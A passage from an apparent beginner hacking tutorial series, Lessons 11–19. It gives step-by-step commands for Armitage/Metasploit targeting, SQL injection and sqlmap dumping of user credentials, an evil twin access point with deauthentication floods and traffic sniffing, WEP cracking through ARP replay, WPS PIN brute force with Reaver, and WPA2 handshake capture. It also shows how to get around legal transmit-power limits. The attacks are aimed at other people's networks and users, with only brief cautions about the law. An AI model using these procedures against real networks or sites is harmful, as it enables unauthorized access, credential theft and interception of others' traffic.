“) should not be used at all (use underscores instead).Do not use anything other than a letter (particularly no numbers!) at the beginning of a file name.Do not use “non-english” characters (such as ä, ö, ü, å or ß) in your file names—or, even better, do not use them at all when programming. USING PYTHON FROM THE COMMAND LINE If you don’t want to use Python from the command line, you don’t have to, just use IDLE. To get into interactive mode just type python3 without any arguments. To run a program, create it with a text editor (Emacs has a good Python mode) and then run it with python3 program_name. RUNNING PYTHON PROGRAMS IN UNIX If you are using Unix (such as Linux, Mac OS X, or BSD), if you make the program executable with chmod, and have as the first line: <span class="co1">#!/usr/bin/env python3</span> you can run the python program with ./hello.py like any other command. Thanks for learning! Lesson 11: Introduction to Armitage Installing Metasploit Now metasploit is not distributed with Kali Linux (it was distributed with backtrack though). However, Kali has it on its repositories, and it can be easily downloaded and installed by executingapt-get install armitage It will check dependencies and download the required file and install Armitage for you. After its done, you can start armitage by using the following codeservice postgresql start service metasploit start armitage You will get a screen like this. Let the settings be as they are, and click connect. You'll get a prompt like this (most of the time) Now you'll see Armitage making some connection for you. For a short while it might show failure messages (Connection Refused), but after some time Armitage will start. And you'll end up with a windows somewhat like this Now while I do believe that the developer has succeeded in making a tool which permits me to say - "I'll take my leave, you can handle stuff from here", but I'd still go on for a while, helping you know some basic stuff before I take my leave. Armitage Basics Now the tough coding (honestly there wasn't anything tough about that) that you had to do with Metasploit, becomes as easy as a click on Armitage. Better yet, you can see exactly what line of code is actually executed when you do something with your mouse. As a start, you should do a quick scan with OS detect. And while it does ask you to enter some stuff now, it is going to be pretty easy, you just have to follow the example given by armitage with some modification. First do your old ifconfig on a new terminal to find you IP ifconfig Notice that most of the time, the first 6 digits are 192.168. You have to figure out the next 3 digits. After that, you can enter the ip into the armitage window. Look at the sample it had provided, just copy that, and, replacing the 1 with 154 as in my case. You final code should be 192.168.154.0/24. The 0/24 means it'll look at all the IPs from 192.168.154.1 to 192.168.154.256. Actually it scans IP from 192.168.xxx.0 through 192.168.xxx.255. Most of the time, you'll find your host in this range, however, to include all IP from 192.168.0.0 to 192.168.255.255, you may use 192.168.0.0/16. This is the automatically generated code after clicking OK. Now, after a few seconds, you will see the following message, and it tells you exactly what you're supposed to do next. Now a couple of computers with respective OS icons will show up on your screen. As expected, you'll have to go to Attacks -> Find attacks. There's no rocket science here, and I'm not putting any more screenshots. After that, right click on the computer you want to hack, and you'll see an attack option. Select whichever you want to try, enter the requisites (you learnt how to do Information gathering in the previous Metasploit tutorials). Everything will be quite easy, except for the fact that the exploits in attack section will be possible exploits, that might or might not work. If you're expecting a click to hack you a Windows 7 machine, then that's just not happening. It might work with an unpatched XP machine, a ms03_026_dcom might do the trick, or the netapi one. Good luck with playing around with this tool. And here's the official Armitage website (media section link, useful vids and pics there) where you might find some more guidance, though the tool doesn't need any. Lesson 12: Sql Injection Basics SQL Injection : How It Works Introduction Lets get started at an apparently unrelated point. Lets assume we create a table in SQL. Now there are three main parts of a database management system, like SQL. They are Creating structure of table Entering data Making queries (and getting meaningful results from data) Now, when SQL is used to display data on a web page, it is common to let web users input their own queries. For example, if you go to a shopping website to buy a smartphone, you might want to specify what kind of smartphone you want. The site would probably be storing data about phones in table with columns like Name, Price, Company, Screen Size, OS, etc. Now they allow you to create a query using some sort of user friendly drop down based form which lets you select your budget, preferred company, etc. So basically, you, the user, can create queries and request data from their SQL servers. Now this automated method of creating queries for you is relatively safe, there is another method of creating queries which can be exploited by us. A url ending in .php is a direct indication that the website/blog uses sql to deliver a lot of it's data, and that you can execute queries directly by changing the url. Now basically the data in the SQL tables is protected. However, when we send some rogue commands to the SQL server, it doesn't understand what to do, and returns an error. This is a clear indication that with proper coding, we can send queries that will make the database 'go berserk' and malfunction, and give us all the otherwise private data of its tables. This attack can be used to obtain confidential data like a list of username and passwords of all users on a website. Steps 1. We have to find a website which is vulnerable to SQL injection (SQLi) attacks. Vulnerability has 2 criteria. Firstly, it has to allow execution of queries from the url, and secondly, it should show an error for some kind of query or the other. An error is an indication of a SQL vulnerability. 2. After we know that a site is vulnerable, we need to execute a few queries to know what all makes it act in an unexpected manner. Then we should obtain information about SQL version and the number of tables in database and columns in the tables. 3. Finally we have to extract the information from the tables. Vulnerabilities are found using your own creativity along with famous dorks (more on this in a later tutorial) For the 2nd and 3rd step, there are 2 ways to do them Manually using some standard codes available online (and if you know SQL then you can figure most of the stuff out yourself). For example, you can instruct the database to give you all the data from a table by executing the commandSELECT * FROM Users WHERE UserId = 105 or 1=1 Now, while the first part of the query "UserID=105" may not be true for all user, the condition 1=1 will always be true. So basically the query will be prompted to return all the data about the user for all the users for whom 1=1. Effectively, you have the username and passwords and all other information about all the users of the website. The first command is legit and gives you access to data of srinivas only, and only in the condition where the password is correct. The second statement gives you access to data of all accounts. Using some tool - Some tools help in making the process easier. You still have to use commands but using tools is much more practical after you have an idea what is actually happening. I don't recommend all the GUI Windows tools which are found on malware filled websites, and never work. All throughout this blog we have used Kali Linux, and if you really are serious about hacking, there is no reason not to have Kali linux installed. In Kali linux, there is a great tool called SQLMap that we'll be using. That's it for this tutorial, you now know how SQL Injections work. It might be worth your time learning some SQL on W3schools till I come up with some other tutorial. Lesson 13: More SQLMap Hacking Websites Using Sqlmap in Kali linux Sql Version Boot into your Kali linux machine. Start a terminal, and type sqlmap -h It lists the basic commands that are supported by SqlMap. To start with, we'll execute a simple command sqlmap -u <URL to inject>. In our case, it will besqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 Sometimes, using the --time-sec helps to speed up the process, especially when the server responses are slow. sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15 Either ways, when sqlmap is done, it will tell you the Mysql version and some other useful information about the database. The final result of the above command should be something like this. Note: Depending on a lot of factors, sqlmap my sometimes ask you questions which have to be answered in yes/no. Typing y means yes and n means no. Here are a few typical questions you might come across Some message saying that the database is probably Mysql, so should sqlmap skip all other tests and conduct mysql tests only. Your answer should be yes (y). Some message asking you whether or not to use the payloads for specific versions of Mysql. The answer depends on the situation. If you are unsure, then its usually better to say yes. Enumeration Database In this step, we will obtain database name, column names and other useful data from the database. List of a few common enumeration commands So first we will get the names of available databases. For this we will add --dbs to our previous command. The final result will look like sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs So the two databases are acuart and information schema. Table Now we are obviously interested in acuart database. Information schema can be thought of as a default table which is present on all your targets, and contains information about structure of databases, tables, etc., but not the kind of information we are looking for. It can, however, be useful on a number of occasions. So, now we will specify the database of interest using -D and tell sqlmap to enlist the tables using --tables command. The final sqlmap command will besqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables The result should be something like this Database: acuart [8 tables] +-----------+ | artists | | carts | | categ | | featured | | guestbook | | pictures | | products | | users | +-----------+ Now we have a list of tables. Following the same pattern, we will now get a list of columns. Columns Now we will specify the database using -D, the table using -T, and then request the columns using --columns. I hope you guys are starting to get the pattern by now. The most appealing table here is users. It might contain the username and passwords of registered users on the website (hackers always look for sensitive data). The final command must be something likesqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -columns The result would resemble this- Data Now, if you were following along attentively, now we will be getting data from one of the columns. While that hypothesis is not completely wrong, its time we go one step ahead. Now we will be getting data from multiple columns. As usual, we will specify the database with -D, table with -T, and column with -C. We will get all data from specified columns using --dump. We will enter multiple columns and separate them with commas. The final command will look like this. sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump Here's the result John Smith, of course. And the password is test. Email is [email protected]?? Okay, nothing great, but in the real world web pentesting, you can come across more sensitive data. Under such circumstances, the right thing to do is mail the admin of the website and tell him to fix the vulnerability ASAP. Don't get tempted to join the dark side. You don't look pretty behind the bars. That's it for this tutorial. Try to look at other columns and tables and see what you can dig up. Lesson 14: Evil Twin Evil Twin Tutorial You will also need to install a tool (bridge utils) which doesn't come pre-installed in Kali. No big dealapt-get install bridge-utils Objectives The whole process can be broken down into the following steps1. Finding out about the access point (AP) you want to imitate, and then actually imitating it (i.e. creating another access point with the same SSID and everything). We'll use airmon-ngfor finding necessary info about the network, and airbase-ng to create it's twin. 2. Forcing the client to disconnect from the real AP and connecting to yours. We'll useaireplay-ng to deauthenticate the client, and strong signal strength to make it connect to our network. 3. Making sure the client doesn't notice that he connected to a fake AP. That basically means that we have to provide internet access to our client after he has connected to the fake wireless network. For that we will need to have internet access ourselves, which can be routed to out client. 4. Have fun - monitor traffic from the client, maybe hack into his computer using metasploit. PS: The first 3 are primary objectives, the last one is optional and not a part of evil twin attack as such. It is rather a man in the middle attack. Picture credits : firewalls.com Information Gathering - airmon-ng To see available wireless interfacesiwconfig To start monitor mode on the available wireless interface (say wlan0)airmon-ng start wlan0 To capture packets from the air on monitor mode interface (mon0) airodump-ng mon0 After about 30-40 seconds, press ctrl+c and leave the terminal as is. Open a new terminal. Creating the twin Now we will use airbase-ng to create the twin network of one of the networks that showed up in the airodump-ng list. Remember, you need to have a client connected to the network (this client will be forced to disconnect from that network and connect to ours), so choose the network accordingly. Now after you have selected the network, take a note of it's ESSID and BSSID. Replace them in given code- airbase-ng -a <BSSID here> --essid <ESSID here> -c <channel here> <interface name> If you face any problems, a shorter code will be- airbase-ng --essid <name of network> mon0 Remove the angular brackets (< & >) and choose any channel that you want. Also, the BSSID can be randomly selected too, and doesn't have to match with the target. The interface would be mon0 (or whatever is the card you want to use) . The only thing identical about the twins has to be their ESSIDs (which is the name of the network). However, it is better to keep all parameters same to make it look more real. After you are done entering the parameters and running the command, you'll see that airbase turned your wireless adapter into an access point. Note : We will need to provide internet access to our client at a later stage. Make sure you have a method of connecting to the net other than wireless internet, because your card will be busy acting like an AP, and won't be able to provide you with internet connectivity. So, either you need another card, or broadband/ADSL/3G/4G/2G internet. Man in the middle attack : Pic Credits: owasp.net Telling the client to get lost Now we have to ask the client to disconnect from that AP. Our twin won't work if the client is connected to the other network. We need to force it to disconnect from the real network and connect to the twin. For this, the first part is to force it to disconnect. Aireplay will do that for usaireplay-ng --deauth 0 -a <BSSID> mon0 --ignore-negative-one The 0 species the time internal at which to send the deauth request. 0 means extremely fast, 1 would mean send a packet every 1 seconds, 2 would mean a packet every 2 seconds, and so on. If you keep it as 0, then your client would be disconnected in a matter of seconds, so fire up the command, and press ctrl+c after a few seconds only. Note that the deauth is sent on broadcast, so all the clients (not just one) connected to the network will disconnect. Disconnecting a specific client is also possible. Not the real one, but why the fake one Even after being disconnected from the real AP, the client may choose to keep trying to connect to the same AP a few more times, instead of trying to connect to ours. We need to make our AP stand out, and for that, we need more signal strength. There are 2 ways to do that1. Physically move closer to the client. 2. Power up your wireless card to transmit at more power. The latter can be done with the following command iwconfig wlan0 txpower 27 Here 27 is the transmission power in dBm. Some cards can't transmit at high power, and some can transmit at extremely high power. Alfa cards usually support upto 30dBm, but many countries don't allow the card to transmit at such powers. Try changing 27 to 30 and you'll see what I mean. In Bolivia, however, you can transmit at 30dBm, and by changing the regulatory domain, we can overcome the power limitation. iw reg set BO iwconfig wlan0 txpower 30 It is strongly advised to not break laws as the transmission limits are there for a reason, and very high power can be harmful to health (I have no experimental evidence). Nevertheless, the client should connect to you if your signal strength is stronger than that you the real twin. Note : If you are unable to get your client to connect to you, there is another option. You can leave him with no options. If you keep transmitting the deauth packets continuously (i.e. don't press ctrl+c after the client has disconnected), he will have no choice but to connect to you. However, this is quite an unstable situation, and the client will go back to the real twin as soon as it gets the chance. Give the fake AP internet access Now we need to provide internet access to the fake AP. This can be done in various ways. In this tutorial, we will consider that we have an interface x0 which has internet connectivity. Now, if you are connected to net via wireless, replace x0 with wlan1 or wlan0, a 3G modem will show up as ppp0. Nevertheless, you just have to know which interface is providing you with internet, and you can route the internet access to your client. Interfaces x0 - This has internet access at0 - This is create by airbase-ng (wired face of the wireless access point). If you can somehow give internet access to at0, then the clients connected to your fake wireless network can connect to the net. evil - This is an interface that we will create, whose job will be to actually bridge the networks. Creating evil We will use Bridge control utility provided by Kali, brctl. Execute the following codebrctl addbr evil This will create the bridge. Now we have to specify which two interfaces have to be bridgedbrctl addif evil x0 brctl addif evil at0 We can assign an IP to the interfaces and bring them up usingifconfig x0 0.0.0.0 up ifconfig at0 0.0.0.0 up Also bring up the evil interface (the interfaces aren't always up by default so we have to do this many times) ifconfig evil up Now to auto configure all the complicated DHCP settings, we'll use dhclient dhclient3 evil & Finally, all the configurations have been completed. You can execute ifconfig and see the results, which will show you all the interfaces you have created. Officially, the evil twin attack is complete. The client is now connected to your fake network, and can use the internet pretty easily. He will not have any way to find out what went wrong. However, the last objective remains. Have fun Now that the client is using the internet via our evil interface, we can do some evil stuff. This actually comes under a Man In The Middle attack (MITM), and I'll write a detailed tutorial for it later. However, for the time being, I will give you some idea what you can do. Sniffing using Wireshark Now all the packets that go from the user to the internet pass through out evil interface, and these packets can be monitored via wireshark. I won't teach you how to use it here, since it is a GUI tool. You can take a look at their website to get an idea on how to use wireshark. Pic credits: The picture on the right has been directly taken from their website. http://www.wireshark.org/docs/wsug_html_chunked/ChapterIntroduction.html Lesson 15: Ad-Hoc Networks (Pentesting yourself the legal way) Create A Wireless Ad-Hoc Network on Windows 8 Using command line For the hackers This method works with all versions of Windows. This article is relevant and important here since the best way to start with hacking is to practice on yourself. You are going to need two adapters for this task. One on Windows which will create the network, and another on Kali Linux which will hack the network. This article concentrates only on the former part of the exercise, and we'll only create an ad-hoc network here. So non-hackers too can follow from here on. For everyone 1. Get access to an elevated command prompt (with administrator privileges). [On Windows 8 : Press Windows key + X or hover your mouse to the lowermost corner on the left part of the screen and right click. Then click "Command Prompt Admin" 2. Now type netsh wlan show drivers 3. If the hosted network supported says yes, move on to the next step 4. Now type - netsh wlan set hostednetwork mode=allow ssid=<enter_network_name_here> key=<enter_password_here> 5. Finally type netsh wlan start hostednetwork. Your ad-hoc network is ready. Lesson 16: Creating a dummy Wi-Fi network for pentesting Creating A dummy wifi for hacking What you'll need At least 2 wireless adapters. I've got three. First one is the internal adapter which came with my laptop. The other 2 are DLink adapters. This is what it looks like. My Dlink Adapter This is what it looks like on my Windows machine ( I blurred the names a bit. Its a sort of convention I guess) What now Now since we have multiple adapters, we can use one of them to create a wireless network on Windows and then practice hacking it on a virtual Kali Linux machine. This is our newly created network. Now we can turn on our Kali machine and see if it is discovered there. So it showed up pretty fine. We can use netsh to modify the security parameters as necessary (WEP, WPA, etc. and practice our hacking skills on our dummy wifi network) Lesson 17: Speeding up WEP Hacking in Kali Linux Speeding Up WEP Hacking In Kali Now if you have followed the basic WEP hacking tutorial, then you are ready to proceed to the stage where you follow an intermediate level hacking tutorial. In this tutorial, we will look at the intricate details of what is happening and approach the complicated methods and concepts. To start with, I'll address a common question 14 March 2014 19:28 i couldn't find any wlan when i write ifconfig in terminal 1. 1. Are you using Kali Linux on a virtual machine. Please note that a wireless adapter can only be used by only one machine at a time. Your host machine has access to the wireless adapter, not the virtual machine. This question has been discussed at length on superuser forums. The conclusion is that you can't directly connect internal wifi card using any Virtual machine software- "Unfortunately no virtualization software allows for direct access to hardware devices like that. Compare VirtualBox with VMware Fusion and Parallels for Mac. All 3 of those programs behave the same way. The only devices that can be directly accessed are usb devices. Everything else is abstracted though the virtualization engine. (Though you could argue that the vm has lower level access to cd rom's and storage devices). I wish I could give you a better answer, than simply to buy a usb wireless card." Basically you have to buy an external wireless card. They aren't very expensive. I personally use two of them myself. If you want to see what I use, take a look here, http://beginnnerhacking.blogspot.in/2014/02/creating-dummy-wifi-for- hacking.html So basically you have 2 choices. First, you can buy a new external wireless adapter (no referral links here). Secondly, you can side install Kali with Windows or run it via a USB. A virtual machine can only use computer hardware if it is externally connected via USB. Now there is another catch here. The internal adapters, almost all of them, don't support injection. This is extremely important for speeding up wireless hacking. So if you really want to go in depth of wireless hacking, then its time to buy an external adapter or two (the more the better). If that's not a possibility, you might want to spend hours trying to get a driver which might make your internal adapter support injection (I don't know anyone who succeeded in this, but it might be possible). Kali Linux I don't know why it needs mention here, but still, if you don't have Kali Linux (or Backtrack) installed yet, you will have to install it before you can start this tutorial. Check Injection Support Aircrack-ng has a comprehensive article related to checking injection support. You might check their website out for it. I am just providing the commands which will be enough to find out whether injectipn is working or not. airmon-ng start wlan0 [or wlan1] (Puts your wireless adapter in monitor mode. From now we'll refer to wlan0/wlan1 as mon0 airserv-ng -d mon0 aireplay-ng -9 127.0.0.1:666 This basically sets up a temporary server sort of thing that is waiting for you to test your injection capabilities. The second command actually tries to inject the server, and succeeds. 127.0.0.1 is the IP which is reserved for loopback. It is always used when you are carrying out some command on yourself. 666 is the port we are using. Most of the time, what follows an IP and a colon is the port. The general form is somewhat like IP:port. So finally you have checked your injection capabilities, and the last line - "Injection is working!" should bring a smile to your face. If not, you'll have to buy a card which supports injection, or see some forum posts which will help you figure something out. Check Signal Strength While the basic hacking methods from the previous post don't have any real strength restriction, you need to be physically close to the access point in order to inject packets. There is information regarding the same in the same aircrack-ng tutorial. Again, I'm gonna summarize what you have to do here. First, we will use airodump-ng mon0 to see the list of networks in range. See the one you want to hack. Airodump-ng lists the networks in range. Now we will hack the digisol network. Make a note of the BSSID of the network you want to hack. A good practice is to store all the information gathered in any text editor. We should, at this stage, take a note of following: ESSID - DIGISOL BSSID - 00:17:7C:22:CB:80 CH (channel) - 2 Mac address of genuine users connected to the network: Interface : wlan1 - referred to as mon0 You should gather the equivalent information for the network you will be working on. Then just change the values whenever I use them in any of the commands Note : We need at least one user (wired or wireless) connected to the network and using it actively. The reason is that this tutorial depends on receiving at least one ARP request packet and if there are no active clients then there will never be any ARP request packets. Now, to check whether the signal strength will be sufficient, we will simply execute the following codeairodump-ng [interface] -c [channel] airodump-ng mon0 -c 2 This will make the wireless card only read packets in the channel no. 2, on which our target network is. Now to test the network, type the following codeaireplay-ng --test -e DIGISOL -a 00:17:7C:22:CB:80 mon0 The last time we checked whether the wireless card had the capability to inject packets. We tested it on our own computer. This time, we actually injected packets into the target computer. If this worked, then it's pretty good news, and it means that you are most probably going to be able to hack this network. The last line 30/30 : 100% determines how good the strength of the signal is. A very high percentage is a good sign, and 100 is ideal. Capture Packets Now we have already run airodump-ng a couple of times. However, this time we will pass the -w command which will instruct airodump-ng to save the output to a file. airodump-ng -c [channel] --bssid [bssid]-w [file_name] [interface] airodump-ng -c 2 --bssid 00:17:7C:22:CB:80 -w dump mon0 Now the output will be saved in a file dump-01.cap Now we can keep this terminal running and it will keep saving the packets. [In the previous tutorial we did only 2 things, capture the packet, i.e this step, and crack it, i.e. the step we are going to do last. While it makes our work easier to just follow two steps, it also makes the process much more time consuming, since we are simply a passive packet listener, who is not doing anything] Speeding Things Up Fake Authentication Now to speed things up, we will inject the network. We will thus obtain ARP packets. These packets will fill up the data column of our airodump-ng capture, and data is what will help us obtain the password. As soon as we have 10000 data packets, we can start attempting to get the password using aircrack-ng. Now to make the AP pay attention to your injected packets, you either have to be a connected client, or have to pretend to be one. You can either mask your mac address to one of the already connected clients, or use the fake authentication feature. We will do the latter. (If you see an error like the AP is on channel x and mon0 is on channel y then go to the bottom of the post for troubleshooting) aireplay-ng -1 0 -e DIGISOL -a 00:17:7C:22:CB:80 mon0 Authenticated and capturing packets ARP request replay mode ARP packets are your best bet at getting a lot of IVs or data. Without IVs you can't hack a network. Enter the following code to make aireplay-ng listen to the AP for ARP packets, and inject them as soon as they find one. This will create a lot of data very fast. This is the real speeding step. aireplay-ng -3 -b [BSSID] mon0 This is what the final code will look likeaireplay-ng -3 -b 00:17:7C:22:CB:80 mon0 This is what it'll look like in the beginning Now you'll have to wait for some time till it gets an ARP request. As soon as it gets one, the terminal will sort of explode. And the data packets will start filling in with Godspeed. Now this is the part where an active user on the network is absolutely necessary. Slow start Everything got fine after some time After some time I had enough packets to crack almost any network The data filled in VERY fast The video shows how fast the IVs flowed in after ARP injection started. Cracking the network Cracking the network is as easy as typing the following into the console aircrack-ng name_of_file-01.cap In our case, the command will be aircrack-ng dump-01.cap After pressing enter, you will have a list of networks and you'll be prompted to select which one of them to hack. In my case there was just one network, so I couldn't get that screen, or a screenshot. The password was cracked in less than a second. I have blurred out the password and some random stuff. So finally you have obtained the password of the network you were trying to hack. Troubleshooting A person commented on another wireless hacking post. This is the problem he faced. whenever i try to use aireplay-ng, with the options, always fail saying that mon0 is in channel -1 and the target is in other channel. How can i fixed this? i looked a lot for a real answer but nobody know what is this. This is a possible solution Okay, try the following1) When you start the monitor mode, specify the channel usage: airmon-ng [channel or frequency] Your code : airmon-ng start wlan0 6 Substitute 6 with the required channel. 2) While starting airodump, specify the channel airodump-ng mon0 -c 6 I was facing this problem when my mon0 kept hopping from one channel to the other, and the second step alone solved my problem. If your airmon-ng assigns itself a fixed channel on its own will, without you even specifying it, then the problem might be more complicated. If the above steps don't solve the problem, take a look here - http://ubuntuforums.org/showthread.php?t=1598930 Lesson 18: Hack WEP with WPS enabled Hack WPA/WPA2 WPS - Reaver - Kali Linux WPA/WPA-2 When it was known that a WEP network could be hacked by any kid with a laptop and a network connection (using easy peasy tutorials like those on our blog), the security guys did succeed in making a much more robust security measure WPA/WPA2. Now hacking WPA/WPA2 is a very tedious job in most cases. A dictionary attack may take days, and still might not succeed. Also, good dictionaries are huge. An exhaustive bruteforce including all the alphabets (uppercase lowercase) and numbers, may take years, depending on password length. Rainbow tables are known to speed things up, by completing a part of the guessing job beforehand, but the output rainbow table that needs to be downloaded from the net is disastrously large (can be 100s of GBs sometimes). And finally the security folks were at peace. But it was not over yet, as the new WPA technology was not at all easy for the users to configure. With this in mind, a new security measure was introduced to compliment WPA. Wifi Protected Setup (WPS). Now basically it was meant to make WPA even tougher to crack, and much easier to configure (push a button on router and device connects). However, it had a hole, which is now well known, and tools like reaver can exploit it in a single line statement. It still might take hours, but it is much better than the previous scenario in which months of brute-forcing would yield no result. Here's what wikipedia says about WPSCreated by the Wi-Fi Alliance and introduced in 2006, the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the available security options to set up Wi-Fi Protected Access, as well as making it easy to add new devices to an existing network without entering long passphrases. Prior to the standard, several competing solutions were developed by different vendors to address the same need. A major security flaw was revealed in December 2011 that affects wireless routers with the WPS feature, which most recent models have enabled by default. The flaw allows a remote attacker to recover the WPS PIN in a few hours with a brute-force attack and, with the WPS PIN, the network's WPA/WPA2 preshared key. Users have been urged to turn off the WPS feature, although this may not be possible on some router models. Working Of WPS Now while most of the things are the same as in WPA, there is a new concept of using pins for authentication. So basically, the client sends 8 digit pins to the access point, which verifies it and then allows the client to connect. Now a pin has 8 digits, and only contains numbers, so its a possible target for bruteforece. Under normal bruteforcing of WPA passwords, you have to consider the fact that there may be number, alphabets, and sometimes symbols (and more than 8 letters). This make the task a billion billion times tougher. However, we can try thousands of keys per second, which make it a tad bit easier. Now in WPS, there is a delay because we have to wait for APs response, and we may only try a few keys per second (practically the best I've seen on my PC is 1 key per 2 sec). Basically, 8 digits and 10 possibilities per digit (0-9) make it 10^8 (interpret ^ as raised to the power of)seconds if we assume one key per second. Now that'll be years. So, where is this taking us? The answer is, there are flaws in this technology that can be used against it. The 8th digit is a checksum of first 7 digits. 10^7 possibilities, i.e. one-tenth time. Two months, still a way to go. The pin number for verification goes in two halves, so we can independently verify the first four and the last four digits. And believe me, its easy to guess 4 digits correct two times, than to guess 8 correct digits at once. Basically, the first half would take 10^4 guess and the second would take 10^3. Now the guesses would be 10^4 + 10^3 (not 10^4 *10 ^3). Now we need 11,000 guesses. So that'll take 3 hours approximately. And that's all the combinations, and most probably the correct pin will not be the last combination, so you can expect to reach the result earlier. However, the assumption is that bruteforcing will take place at a key per second. My personal best is a key every 2 seconds, and yours might drop to as low as a key every 10 seconds. How to carry out the attack Now it might have been tough to carry out this attack at some point in history, but now, its a breeze. If you have all the prerequisites, then hacking the network would be as easy as reaver -i <interface-name> -b <BSSID of target> And if you are already familiar with hacking WEP, then just go to your Kali Linux terminal and type the above command (replacing what needs to be replaced). Leave your machine as is, come back 10 mins later, check the progress (must be 1% or something), and go take a nap. However, if you're a newbie, then tag along. Kali Linux First off, you need to have Kali linux (or backtrack) up and running on your machine. Any other Linux distro might work, but you'll need to install Reaver on your own. (Reaver has a known issue : Sometimes it doesn't work with Virtual Machines, and you might have to do a live boot using live CD or live USB of Kali Linux. See the last section of this post on = troubleshooting by scrolling down a bit) Information Gathering Now you need to find out the following about you target networkDoes it have WPS enabled. If not, then the attack will not work. The BSSID of the network. Now to check whether the network has WPS enabled or not, you can either use wash or just use the good old airodump-ng. Wash is specifically meant to check whether a network has WPS enabled or not, and thereby is much easier to use. Here are the stepsSet your wireless interface in monitor modeairmon-ng start wlan0 Use wash (easy but sometimes unable to detect networks even when they have wps enabled). If any network shows up there, it has WPS enabled. wash -i mon0 This will show all the networks with WPS enabled This is an error which I haven't figured out yet. If you see it, then you'll have to do some howework, or move on to airodump method. Update : wash -i mon0 --ignore-fcs might solves the issue. Use airodump-ng. It will show all networks around you. It tells which of them use WPA. You'll have to assume they have WPS, and then move to next steps. airodump-ng mon0 None of them has WPS enabled, just saying. BSSID of the network - Now irrespective of what you used, you should have a BSSID column in the result that you get. Copy the BSSID of the network you want to hack. That's all the information you need. So by now you must have something like XX:XX:XX:XX:XX:XX, which is the BSSID of your target network. Keep this copied, as you'll need it. Reaver Now finally we are going to use Reaver to get the password of the WPA/WPA2 network. Reaver makes hacking very easy, and all you need to do is enterreaver -i mon0 -b XX:XX:XX:XX:XX:XX Explanation = i - interface used. Remember creating a monitor interface mon0 using airmon-ng start wlan0. This is what we are using. -b species the BSSID of the network that we found out earlier. This is all the information that Reaver need to get started. However, Reaver comes with many advanced options, and some are recommended by me. Most importantly, you should use the -vv option, which increases the verbosity of the tool. Basically, it writes everything thats going on to the terminal. This helps you see whats happening, track the progress, and if needed, do some troubleshooting. So final command should bereaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv After some hours, you will see something like this. The pin in this case was intentionally 12345670, so it was hacked in 3 seconds. Here is an extra section, which might prove useful (or more like consoling, to let you know you are not the only one who is having troubles) Known problems that are faced - Troubleshooting 1. As in the pic above, you saw the first line read "Switching wlan0 to channel 6". (Yours will be mon0 instead of wlan0). Sometimes, it keeps switching interfaces forever. 2. Sometimes it never gets a beacon frame, and gets stuck in the waiting for beacon frame stage. 3. Sometimes it never associates with the target AP. 4. Sometimes the response is too slow, or never comes, and a (0x02) or something error is displayed. In most cases, such errors suggest1. Something wrong with wireless card. 2. AP is very choosy, won't let you associate. 3. The AP does not use WPS. 4. You are very far from the AP. Possible workarounds1. Sometimes, killing naughty processes helps. (see pictures below) 2. Move closer to target AP 3. Do a fakeauth using aireplay-ng (Check speeding up WEP hacking) and tell Reaver not to bother as we are already associated using -A (just add -A at the end of your normal reaver code) 4. If you are using Kali Linux in Vmware, try booting into Kali using USB. I don't know why, but sometimes internal adapters work wonders, and can't be used from inside of a VM. In my case, booting up from USB and using internal adapter increased the signal strength and speeded up the bruteforce process. Update : It has nothing to do with internal adapter. I have verified my observation with various hackers, and it is now a known problem with Reaver. It does not work well inside Virtual machines. It is recommended that you do a live boot. processes causing problems Kill 'em all Lesson 19: Hack WPA-2 PSK Capture Handshake Hack WPA-2 PSK Capturing the Handshake WPA password hacking Okay, so hacking WPA-2 PSK involves 2 main steps1. Getting a handshake (it contains the hash of password, i.e. encrypted password) 2. Cracking the hash. Now the first step is conceptually easy. What you need is you, the attacker, a client who'll connect to the wireless network, and the wireless access point. What happens is when the client and access point communicate in order to authenticate the client, they have a 4 way handshake that we can capture. This handshake has the hash of the password. Now there's no direct way of getting the password out of the hash, and thus hashing is a robust protection method. But there is one thing we can do. We can take all possible passwords that can exists, and convert them to hash. Then we'll match the hash we created with the one that's there in the handshake. Now if the hashes match, we know what plain text password gave rise to the hash, thus we know the password. If the process sounds really time consuming to you, then its because it is. WPA hacking (and hash cracking in general) is pretty resource intensive and time taking process. Now there are various different ways cracking of WPA can be done. But since WPA is a long shot, we shall first look at the process of capturing a handshake. We will also see what problems one can face during the process (I'll face the problems for you). Also, before that, some optional wikipedia theory on what a 4-way handshake really is (you don't want to become a script kiddie do you?) The Four-Way Handshake The authentication process leaves two considerations: the access point (AP) still needs to authenticate itself to the client station (STA), and keys to encrypt the traffic need to be derived. The earlier EAP exchange or WPA2-PSK has provided the shared secret key PMK (Pairwise Master Key). This key is, however, designed to last the entire session and should be exposed as little as possible. Therefore the four-way handshake is used to establish another key called the PTK (Pairwise Transient Key). The PTK is generated by concatenating the following attributes: PMK, AP nonce (ANonce), STA nonce (SNonce), AP MAC address, and STA MAC address. The product is then put through PBKDF2-SHA1 as the cryptographic hash function. The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast and broadcast traffic. The actual messages exchanged during the handshake are depicted in the figure and explained below: 1. The AP sends a nonce-value to the STA (ANonce). The client now has all the attributes to construct the PTK. 2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including authentication, which is really a Message Authentication and Integrity Code: (MAIC). 3. The AP sends the GTK and a sequence number together with another MIC. This sequence number will be used in the next multicast or broadcast frame, so that the receiving STA can perform basic replay detection. 4. The STA sends a confirmation to the AP. All the above messages are sent as EAPOL-Key frames. As soon as the PTK is obtained it is divided into five separate keys: PTK (Pairwise Transient Key – 64 bytes) 1. 16 bytes of EAPOL-Key Confirmation Key (KCK)– Used to compute MIC on WPA EAPOL Key message 2. 16 bytes of EAPOL-Key Encryption Key (KEK) - AP uses this key to encrypt additional data sent (in the 'Key Data' field) to the client (for example, the RSN IE or the GTK) 3. 16 bytes of Temporal Key (TK) – Used to encrypt/decrypt Unicast data packets 4. 8 bytes of Michael MIC Authenticator Tx Key – Used to compute MIC on unicast data packets transmitted by the AP 5. 8 bytes of Michael MIC Authenticator Rx Key – Used to compute MIC on unicast data packets transmitted by the station The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used 